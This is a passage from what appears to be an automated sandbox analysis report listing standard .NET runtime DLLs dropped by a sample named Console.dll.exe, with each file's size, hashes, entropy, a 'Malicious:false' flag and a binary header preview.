                                                                                                                                                                                                                        Size (bytes):16560
                                                                                                                                                                                                                        Entropy (8bit):6.729602165564424
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:IAWYjxPWrPWide3WT56Os1HnhWgN7a8WfcucI8HNsAX01k9z3AKrRau52:I49PWrPWiN5kHRN7OctHNsAR9zdRa1
                                                                                                                                                                                                                        MD5:5CC98FE2712D9F999BF2DF9C8A6CE70A
                                                                                                                                                                                                                        SHA1:2D28D7DBC7087960E52F0F460B82C774E537ABCF
                                                                                                                                                                                                                        SHA-256:5E431DA6B4210EBBDEC774D3C03F05771549E63ED620E3A58B2C2649F3F13FEC
                                                                                                                                                                                                                        SHA-512:543F9D71918761CEE84EEE640B7804D65A8FE0CF837268FE58D29F3724D250D618B70138275B754FE11BCBD5B3FB65249A1025746B0308E552CA387381F619C6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Jm..........."!..0..............,... ........@.. ...............................}....`.................................c,..X....@...................(...`......\+..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........"..t...........P ......h"...........................................<linker>.. <assembly fullname="System.IO.Pipes.AccessControl" feature="System.Resources.UseSystemResourceKeys" featurevalue="true">.. System.Resources.UseSystemResourceKeys removes resource strings and instead uses the resource key as the exception message -->.. <resource name="FxResources.System.IO.Pipes.AccessControl.SR.resources" action="remove" />.. <type fullname="System.SR">..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Pipes.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):153760
                                                                                                                                                                                                                        Entropy (8bit):6.346118388867078
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:JwazcYTjypBZ/9R34Elx1G8q4pqXS8IMrmsK9VrMFCh:ZzfTjypBZ/9RQgN2U
                                                                                                                                                                                                                        MD5:6876ECC8E9D7639E6C1DD2DE72434538
                                                                                                                                                                                                                        SHA1:6FE865D6830A806831C3AAC55F8BB88DF598B453
                                                                                                                                                                                                                        SHA-256:C6DFF7C81BC13219FFD74C8215B4A633A5796B14D9BAF3D9DA94AD6C142CF86A
                                                                                                                                                                                                                        SHA-512:1D301DC18569A1E2647229AB3A23D46F9CB46D703C382F5909E5649D7B01F20F373398382A6698F4C98B607274886BF302123CD7379D972C62E08B16DB98ABA0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!.........P....................@..........................0............@.............................................P...4-.......0...(......D...,...p...........................................................P...H............text...a........................... ..`.data....#.......0..................@....reloc..D........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.UnmanagedMemoryStream.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15536
                                                                                                                                                                                                                        Entropy (8bit):6.818074751723726
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:SjwH2sWR+WiX5kHRN7JctHNsAR9zd9aUp:SjwH2LZsts89znjp
                                                                                                                                                                                                                        MD5:6543BF3F9F9A5255FCE6549320B4CCBF
                                                                                                                                                                                                                        SHA1:87145D063B37C1630FEA43B8431B2702F03AB3AF
                                                                                                                                                                                                                        SHA-256:BFB6473F923584B5337A63F880C1E0964DBFB96182BFA758F34C26084D1677C4
                                                                                                                                                                                                                        SHA-512:BF58079D8D9410450A8F0EFC83D30F3840DD18F127E4A59282FA7D479FDD778CB50031125C63A4E3F85169AA9C29D334DEDF31C293A5BD0D6B011783D25F79C9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:............." ..0..............)... ...@....... ..............................g.....`..................................)..O....@...................(...`.......(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~..D.......#Strings............#US.........#GUID...(.......#Blob......................3................................................$...........=.n.........h.....#.>.....>...x.7.................>...].>.....>.....>.....>...D.>...Q.>.................h.....h.....h...).h...1.h...9.h...A.h...Q.h. .Y.h...a.h...i.h...q.h...y.h.....h.....h.......................#.....+.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16144
                                                                                                                                                                                                                        Entropy (8bit):6.683059996690503
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:MzN83yxAhHWvbWiluWXebPpUNTQHnhWgN7agWqkJ8RwX01k9z3AYP/AS:8N83YSWvbWilTb2HRN7pY9R9zFHx
                                                                                                                                                                                                                        MD5:E766803259D3A5739DF189EA6A14E233
                                                                                                                                                                                                                        SHA1:F40A96F2EDA58E984BA329485133DBE2F353ED50
                                                                                                                                                                                                                        SHA-256:35124820D1C09438E90E75C2C976765600494117ADC9F762793B07E4A91FDB2D
                                                                                                                                                                                                                        SHA-512:1EA9D71F2052566B9CC6483CAF5B0F12DB30F18F5EE75EB4F63251B54506C283ADB7061343E26C1F05E35A870286004DB8601CD242BE908B424D055C6954A4C8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.U..........." ..0..............*... ...@....... ..............................1d....`.................................7*..O....@..$................)...`......d)..T............................................ ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B................k*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID... ...t...#Blob......................3............................................................=...........h.....#...........S.....i.....8.............................Q...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Expressions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3389616
                                                                                                                                                                                                                        Entropy (8bit):6.820104626983943
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:R7azhlQa3d5yGwJ13WehDniVpO9+0Gaw3GoFcOegvE5ibjo2m5Nu1R+Z39Syk9Br:lvQegvE5ibjWN8rekQod
                                                                                                                                                                                                                        MD5:D139434315B5E59CAC22A909175F22CC
                                                                                                                                                                                                                        SHA1:59C4F975EB697231A421EBB4E3F2B4478872C64D
                                                                                                                                                                                                                        SHA-256:E027715162AAF4BB41722F24017AE6EABB57B6BA9DEA35A2ACB53F0A84405537
                                                                                                                                                                                                                        SHA-512:D6FD00EF4B55AF905718D2D16F842F89DAEBC1F2B0713A7C31B5675C935CD8AA9E8060DE053169D4C4D495053F273FBC85A51536822046CF6E0666951F595A80
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ZJ.............!.....`+.. ...............p+...@...........................3.......4...@.................................................lj..`.....3..(...`0..+...b..p...............................................................H............text...![+......`+................. ..`.data........p+......p+.............@....reloc...+...`0..0...`0.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Parallel.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):735392
                                                                                                                                                                                                                        Entropy (8bit):6.860936523020534
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:xsS7p3vALOFpNXz3voXm1wXxPhbgKN2Znq760Lfc+G1OsV4PNhu7RC:x97p40DvoXm4xPhbgKN2Znq760Lg1OsM
                                                                                                                                                                                                                        MD5:F65D55A84EEDAF2D678883C3CD643C42
                                                                                                                                                                                                                        SHA1:61256DB063A3FAA7A9E2B77E920DBCF68EC65EC8
                                                                                                                                                                                                                        SHA-256:56B02D7090DADAB387F49E96B4F49229BDE6BA43079BC395B6F19CEB663C4674
                                                                                                                                                                                                                        SHA-512:D6287BF18DA1D4F9BCA4B369186D80E020DD1DEEB6E17D2D303D1F86740304A618122BA9B5EE43DB8083B8666DB419EE746E9B1750F87762D823E6FA02CB1EEF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....`...................p....@.......................................@......................................................=.......(.......s..t...p...............................................................H............text....X.......`.................. ..`.data........p... ...p..............@....reloc...s..........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Queryable.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):166048
                                                                                                                                                                                                                        Entropy (8bit):6.450357820603372
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:jXl74Q+lNCtMuqPl1AMjnww49JK2tLnhX440TAfAYCz:x74Q+lNCtMuqt1djnww49nhX442a2
                                                                                                                                                                                                                        MD5:B5565E9DD1FBD962943D8F262D1B58AC
                                                                                                                                                                                                                        SHA1:7DC14160B9003EC8070C2FF3832F90323BCF6F84
                                                                                                                                                                                                                        SHA-256:D56028C9C8E2E1C0EFA4D8F58BBBB0398D11BC9932C6CE19D1BC3F680AE8DF60
                                                                                                                                                                                                                        SHA-512:90B56B71E2C62F92ACB7D56B4D8E778DD3133158C1F477ADD5FD9DDDE6A7D2CA2A11F80CE68EB02092C6823CC7235852E5A2D8FF51627EC6E8B6737632A0EB11
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........p....................@..........................`.......*....@..................................................'.......`...(...@..........p...............................................................H............text............................... ..`.data....F.......P..................@....reloc.......@... ...@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):489632
                                                                                                                                                                                                                        Entropy (8bit):6.821466814840251
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:phiERK3x+3SDxjW3TZUbm9+Dse31pufbFHJMBctAHfYz7SCepKwkd60yKK9KSLID:nid343yWZ9de3HEvIcGoSWj6rK1tD
                                                                                                                                                                                                                        MD5:F3EE4F3C3F8AD6A014F9F5533D132FDD
                                                                                                                                                                                                                        SHA1:AB09474254047B19943174D228147EE8DE5B9754
                                                                                                                                                                                                                        SHA-256:ECAEF6E286862A9339C721B3062A76F0ADDC09534FA83E6C7CF13400774CA46D
                                                                                                                                                                                                                        SHA-512:18E2331580AB59FE803F318F8CCDD4A443D43C61CC4D5F461CA15AE0EC4ECE4BBC2A951D30B30D95FA9D068E1988B3EF2CDE502331678FB971F86EB43FA684B7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$............!.....`...................p....@..........................P......T=....@.............................................0...T_...-...P...(.......?......p...........................................................0...H............text....Z.......`.................. ..`.data........p.......p..............@....reloc...?.......@..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Memory.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):145672
                                                                                                                                                                                                                        Entropy (8bit):6.837720097380332
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:d3utBRnW4gvwZuIBo7MhSM6ToYdfCBuqmwNxg6eNinK:I5nOIBo7MSGGfCBuN6eNX
                                                                                                                                                                                                                        MD5:4D8E52B1C5A76C8EB8EC4810A1872C26
                                                                                                                                                                                                                        SHA1:41557EC65946C06F2775AAE52EBC4431D8793E22
                                                                                                                                                                                                                        SHA-256:5CC24FDBF7DD10C17CC562A2026E44B5478BAA8BE4B78B65D472AEC9CE9CB754
                                                                                                                                                                                                                        SHA-512:39341075F2C1E2016EB88257CAC52BDCA42F88CF47041D0A2AEFCC2036CF7102F083B7214A10CF36AD9FC0D9C99FD0F5AFE4A64A76F7A2A9E3A37446EDC0359B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.............!.........0....................@.......................................@.............................................@....0..p........)..............p...........................................................@...H............text............................... ..`.data............ ..................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Http.Json.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):112800
                                                                                                                                                                                                                        Entropy (8bit):6.501992000665386
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:zUn9XWOZ+UvBOhcRRY4beFea0vSV4rpMvhSL:o9XWOZ+UpOhOzafVpo
                                                                                                                                                                                                                        MD5:16805DF42CC8349DB1A87DDF54487A97
                                                                                                                                                                                                                        SHA1:E9C9613A2FA9614C055497A77BE43BBC74F69EF7
                                                                                                                                                                                                                        SHA-256:5FAFA3242E0778EA66F4DA8B810B06316C799D92BC61844FD98D902D6E579861
                                                                                                                                                                                                                        SHA-512:80ABDF0BD63685DEE65192F150705DB1A3652380309973400FDF308A9874C7C635136C18281E3765C836EF12EF054C151EC41EA25051451908E7AA9619A22D4D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t............!.....@...@...............P....@................................. &....@..................................................(..@........(......|.......p...............................................................H............text....;.......@.................. ..`.data....,...P...0...P..............@....reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Http.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1575072
                                                                                                                                                                                                                        Entropy (8bit):6.79275426432514
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:IkqL9MaE2i2nLa4rG8cHZRkWFZ9d4bxf/NHVK16hZ/SjET:IkcpLFx+i3
                                                                                                                                                                                                                        MD5:118E26447BD46FD8C0DEED6F352846E1
                                                                                                                                                                                                                        SHA1:26A6D8C6DBC04E9923EC34391EC8FB40BAB995C4
                                                                                                                                                                                                                        SHA-256:466F5166B294238FBAC78FC099EBFD45E0EAE2726FCEF3B9C76B14D01F26B205
                                                                                                                                                                                                                        SHA-512:7D5B3EC462BCE36BDF91BE44D8686F4A3F3F955C9204C6C567C257389544517BF199DAED1B18259FBF8D104DD45410FB853A9D2A26D8CB3D158E4BFC86BFA5EE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.............!.....`...p...............p....@.................................).....@.............................................P...4|..PT.......(......h....o..p...........................................................P...H............text...+Y.......`.................. ..`.data........p.......p..............@....reloc..h...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.HttpListener.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):493728
                                                                                                                                                                                                                        Entropy (8bit):6.691474946270242
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:9gv2/jWzKlfcWIJIqX5b/Sc7fkDNRd2B/w88smplmEWZg7gG5NfW9T28:9G2/jsKxc5bxxGDWZgNId28
                                                                                                                                                                                                                        MD5:A2B317246ADE25ED093BE6C5FC4A3C25
                                                                                                                                                                                                                        SHA1:DD5C20E51EC6C6919B1778DF26FA0086EBD759B3
                                                                                                                                                                                                                        SHA-256:7CF335D177B3C367A699BCDB2C7EBA731D619FB5B9F23BB51E8FFFB585DFC0B8
                                                                                                                                                                                                                        SHA-512:7553A2293BF3C47586008CA42303D3ED26655FB690CE2E8F60097A27C28ACDD5063C008A1ED77C0301E6B2EE198C3D7D2532306B77920D19356E04830DAF4717
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a.............!..............................@..........................`.......4....@..................................................s..H....`...(......TE...,..p...............................................................H............text....|.......................... ..`.data...Ot..........................@....reloc..TE.......P..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Mail.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):391328
                                                                                                                                                                                                                        Entropy (8bit):6.669885547452077
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:bXJ1mUGnQkW1V0yI4wLkz4O1ViVArh7JkddSXbmqRSkrJ8kkPg60YVkhH:bfF1V/73d7xSkNksH
                                                                                                                                                                                                                        MD5:F05C85AF14DA248B425696F0B758F80F
                                                                                                                                                                                                                        SHA1:833CD9BDEF5E478CFE10298C637744C311786131
                                                                                                                                                                                                                        SHA-256:E04C829ED692B94CE1516A6E2E4FA126ACABFD3B2ADC778D866685F532F7D5B0
                                                                                                                                                                                                                        SHA-512:4569247B6268159D01CFA6EC5F18F6F2C6FCDD84278590C8E886BFC3276D364DCDDE3D5405C83FEE85C5789DA9AFA26117305CC73B8120E1EB10208C3E5D5A9B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>b.............!..... ...................0....@.......................................@.............................................P....b..x........(......09...*..p...........................................................P...H............text...%........ .................. ..`.data...^S...0...`...0..............@....reloc..09.......@..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.NameResolution.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):100528
                                                                                                                                                                                                                        Entropy (8bit):6.408332561420003
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:9Vd8ThKTl2pVRSkjP54RgNCDanATWUthW:f2ThKTl2pVRSktxwDyApW
                                                                                                                                                                                                                        MD5:78FEE1E71754F45186CBCD1F3D2F550D
                                                                                                                                                                                                                        SHA1:8AFF44B434180D78BCC185E958C169293B00777A
                                                                                                                                                                                                                        SHA-256:B30BE057B179211A1A030851631C98EABDAC6884314C825D82671E5C1CC8A38A
                                                                                                                                                                                                                        SHA-512:8FDD97F68C8FF3897FF6D242C1DAF8DB85FC685FE152442EBFADCBBA623BD2D983D0A34CBCE4410268D52FD5C08D3D9AEABD05A18EADB4CE777C4EAD21E3E98C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q..............!..... ...0...............0....@..........................`...... .....@..................................................%.......`...(...P..<.......p...............................................................H............text...3........ .................. ..`.data........0... ...0..............@....reloc..<....P.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.NetworkInformation.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):141472
                                                                                                                                                                                                                        Entropy (8bit):6.505080237791626
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:d122j2ZoLA3RtqbqlkQG5pNZncU/HLVXyVMn+jtwvphYMWP:f2A2ZoLA3RQbT5fXSwvM
                                                                                                                                                                                                                        MD5:1A86053B5ED789A72AA59FCED3EC6EC9
                                                                                                                                                                                                                        SHA1:4AB351829E1DA268C2916659AF314B91390FE184
                                                                                                                                                                                                                        SHA-256:E6E275D7A625D5D93A19AE8506DE6330D5C3B7AB83EC05DDD17F26D4D5285F5F
                                                                                                                                                                                                                        SHA-512:F833C75FD0EFF6F3257E9B2FFF85CB6B30F94DE0A329887DF8459CA9CB22E3A5A690A4944A492237352897215024E40292042FD5F2DA26C6C114146F570DF3E1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.............!.........0....................@.......................................@..................................................+...........(......x.......p...............................................................H............text............................... ..`.data............ ..................@....reloc..x...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Ping.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):84128
                                                                                                                                                                                                                        Entropy (8bit):6.309435546000757
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:kmn8R9qcTQ3QOffr1Sml9hswibRSsYwlFb+k/gJR7SSo/k9hhWQiEEz3:kq8R9WdnhXl9hswZsYcN+XJR7SSik9hE
                                                                                                                                                                                                                        MD5:315404236E9CA52394E4895C2345DC0C
                                                                                                                                                                                                                        SHA1:5F5CF225A4861C720156009D48303CA81944F76C
                                                                                                                                                                                                                        SHA-256:A1CD3560A53DE95B9C2E743EAE582F624D2A04E47D5C32D21A33C26228E4264E
                                                                                                                                                                                                                        SHA-512:759C90A967AB55DE0BD0C001D7324C7138D54DB49A9DDD357A4A25A4C76CC3ED767CEC42D755AA5490DF708AA8F7198E5D7AFC19EA832E13AC52D9A96532FC19
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........0....................@.......................... ............@.............................................P....!....... ...(..............p...........................................................P...H............text...o........................... ..`.data...L........ ..................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Primitives.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):211104
                                                                                                                                                                                                                        Entropy (8bit):6.660826134983506
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:Rirgyu9M7v2BhwiaFZBGF1apoTukx61eQikRJNtJzDdSlf:R/yu9/F/YRJNt/U
                                                                                                                                                                                                                        MD5:88137DED6B392306052D9271138AE2F9
                                                                                                                                                                                                                        SHA1:1547B682B65DAF6029012DF6CE220BC9E17578D6
                                                                                                                                                                                                                        SHA-256:D926C8C930DA9618DBAC2FB56EFA4516913A7630CC46F8BFB7FD0B3418895EE7
                                                                                                                                                                                                                        SHA-512:922D7BA874BE40F80F7D82E917309A56D904CFE2DF7E922C6493FB6A725096A31014C4A78A5A50B1D7C445028006A02AD994C4E167B5AF7261DA33B27CAAEB62
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ay`............!.........P....................@.................................+^....@..................................................<...........(......l...h ..p...............................................................H............text............................... ..`.data....).......0..................@....reloc..l........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Quic.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):256176
                                                                                                                                                                                                                        Entropy (8bit):6.560738723174753
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:rEr+6CK8OezB8tyIemYJEu3Zt9DUHqH2xM8ySqw3GnT1t:or+6CK8Oo84cYJ9nmRMGqwaT3
                                                                                                                                                                                                                        MD5:F1E7A34860B477FE52C530A10C46DE38
                                                                                                                                                                                                                        SHA1:A37BCC345F873216FBF382F9CD05052E804C53BD
                                                                                                                                                                                                                        SHA-256:25C73041537E971DD3AF5DBBAB1C2965C09599B92554F428482AD74FD6C2A90A
                                                                                                                                                                                                                        SHA-512:732BF3438DD51BAE290FFB2D28FF47DA35DB4C201D2E973220A07D9C0AAB945B215D0A3273B87FB631B89EC07B435C44E5F29675CEEA61DD4781E348EA65EBE3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u.............!.....0...................@....@..................................w....@.............................................P...hB..X........(....... ..T!..p...........................................................P...H............text..../.......0.................. ..`.data....@...@...P...@..............@....reloc... .......0..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Requests.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
